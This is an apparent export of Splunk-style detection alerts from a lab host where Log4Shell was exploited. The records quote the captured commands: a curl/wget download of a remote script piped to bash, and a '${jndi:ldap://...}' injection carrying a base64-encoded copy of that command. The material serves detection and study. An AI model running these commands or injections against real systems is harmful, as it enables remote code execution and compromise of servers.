lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643954, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="T1059", annotations._all="DE.AE", annotations._all="PR.PT", annotations._all="Actions on Objectives", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 13", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._all="PR.DS", annotations._all="Source:Endpoint", annotations._all="Stage:Initial Access", annotations._all="Command and Control", annotations._all="CIS 12", annotations._all="DE.CM", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642643951, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 3", annotations._all="Source:Application Log", annotations._all="CIS 16", annotations._all="CIS 5", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="DE.CM", annotations._all="T1190", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Execution", annotations._all="Reconnaissance", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642643954, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="T1059", annotations._all="DE.AE", annotations._all="PR.PT", annotations._all="Actions on Objectives", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 13", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._all="PR.DS", annotations._all="Source:Endpoint", annotations._all="Stage:Initial Access", annotations._all="Command and Control", annotations._all="CIS 12", annotations._all="DE.CM", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", 